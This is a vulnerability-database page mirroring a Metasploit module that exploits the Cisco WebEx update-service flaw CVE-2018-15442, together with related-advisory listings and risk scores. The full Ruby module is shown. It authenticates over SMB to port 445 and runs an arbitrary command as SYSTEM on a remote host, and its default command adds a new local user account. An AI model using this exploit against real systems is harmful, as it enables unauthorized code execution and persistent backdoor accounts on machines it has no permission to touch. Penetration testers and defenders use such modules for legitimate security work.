Vulners
Lucene search
WebEx Remote Command Execution Utility
🗓️ 31 Aug 2024 00:00:00Reported by Ron Bowes, metasploit.comType 
packetstorm🔗 packetstormsecurity.com👁 145 Views
| Reporter | Title | Published | Views | Family All 25 |
|---|---|---|---|---|
 | WebEx Local Service Permissions Code Execution Exploit | 25 Oct 201800:00 | – | zdt |
| WebExec Authenticated User Code Execution Exploit | 25 Oct 201800:00 | – | zdt |
| Cisco WebEx Meetings Privilege Escalation Vulnerability | 28 Nov 201800:00 | – | zdt |
 | Get System-level Code Execution Through Webex Vulnerability | 24 Oct 201800:00 | – | attackerkb |
 | CVE-2018-15442 | 24 Oct 201821:28 | – | circl |
 | Cisco Webex Meetings Desktop App Update Service Command Injection Vulnerability | 24 Oct 201816:00 | – | cisco |
 | Cisco Webex Meetings Desktop App < 33.6.4 Command Injection Vulnerability | 27 Dec 201800:00 | – | nessus |
 | Cisco Webex Meetings Desktop App Update Service Command Injection Vulnerability | 25 Oct 201800:00 | – | cnvd |
 | Cisco Webex Meetings Desktop App Update Service Command Injection (CVE-2018-15442) | 24 Dec 201800:00 | – | checkpoint_advisories |
 | CVE-2018-15442 | 24 Oct 201819:00 | – | cve |
10
`##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Auxiliary
include Msf::Exploit::Remote::SMB::Client::WebExec
include Msf::Auxiliary::Report
include Msf::Auxiliary::Scanner
# Aliases for common classes
SIMPLE = Rex::Proto::SMB::SimpleClient
XCEPT = Rex::Proto::SMB::Exceptions
CONST = Rex::Proto::SMB::Constants
def initialize(info = {})
super(update_info(info,
'Name' => 'WebEx Remote Command Execution Utility',
'Description' => %q{
This module enables the execution of a single command as System by exploiting a remote
code execution vulnerability in Cisco's WebEx client software.
},
'Author' => [
'Ron Bowes <[email protected]>',
],
'License' => MSF_LICENSE,
'References' => [
['URL', 'https://webexec.org'],
['CVE', '2018-15442']
]
))
register_options([
OptString.new('COMMAND', [true, 'The command you want to execute on the remote host', 'net user testuser testpass /add']),
OptPort.new('RPORT', [true, 'The Target port', 445]),
OptBool.new('FORCE_GUI', [true, 'Ensure a GUI is created via wmic', false]),
])
end
# This is the main control method
def run_host(ip)
@smbshare = datastore['SMBSHARE']
@ip = ip
# Try and authenticate with given credentials
if connect
begin
smb_login
rescue Rex::Proto::SMB::Exceptions::Error => autherror
print_error("Unable to authenticate with given credentials: #{autherror}")
return
end
command = datastore['COMMAND']
if datastore['FORCE_GUI']
command = "WMIC PROCESS CALL Create \"#{command}\""
end
wexec(true) do |opts|
execute_single_command(command, opts)
end
print_good("Command completed!")
disconnect
end
end
end
`
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
31 Aug 2024 00:00Current
7High risk
Vulners AI Score7
CVSS 27.2
CVSS 37.8
EPSS0.43344
SSVC